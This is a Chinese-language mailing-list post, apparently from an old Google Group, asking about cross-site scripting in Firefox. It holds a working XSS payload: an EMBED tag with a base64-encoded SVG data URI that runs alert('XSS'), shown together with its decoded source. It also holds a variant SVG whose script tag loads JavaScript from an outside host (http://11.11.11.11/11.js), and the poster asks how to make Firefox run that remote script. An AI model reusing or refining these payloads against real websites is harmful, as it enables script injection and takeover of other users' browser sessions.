我在firefox使用如下的代码,是可以成功弹出对话框的 <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
上述base64码的明文是 <svg xmlns:svg="http://www.w3.org/2000/svg"; xmlns=" http://www.w3.org/2000/svg"; xmlns:xlink="http://www.w3.org/1999/xlink"; version="1.0" x="0" y="0" width="194" height="200" id="xss"><script type="text/ecmascript">alert("XSS");</script></svg> 可是我改成如下内容后base64编码替换后却不行了,这究竟是为什么呢?另外期间似乎还成功了一次 <svg xmlns:svg="http://www.w3.org/2000/svg"; xmlns=" http://www.w3.org/2000/svg"; xmlns:xlink="http://www.w3.org/1999/xlink"; version="1.0" x="0" y="0" width="194" height="200" id="xss"><script src=" http://11.11.11.11/11.js"; type="text/ecmascript"></script></svg> http://11.11.11.11/11.js里为javascript 另外在firefox里我要达成这样的效果的话应该如何弄呢?即运行我放在http://11.11.11.11/11.js里的javascript -- I am aking --~--~---------~--~----~------------~-------~--~----~ 要向邮件组发送邮件,请发到 [email protected] 要退订此邮件,请发邮件至 [email protected] -~----------~----~----~----~------~----~------~--~---
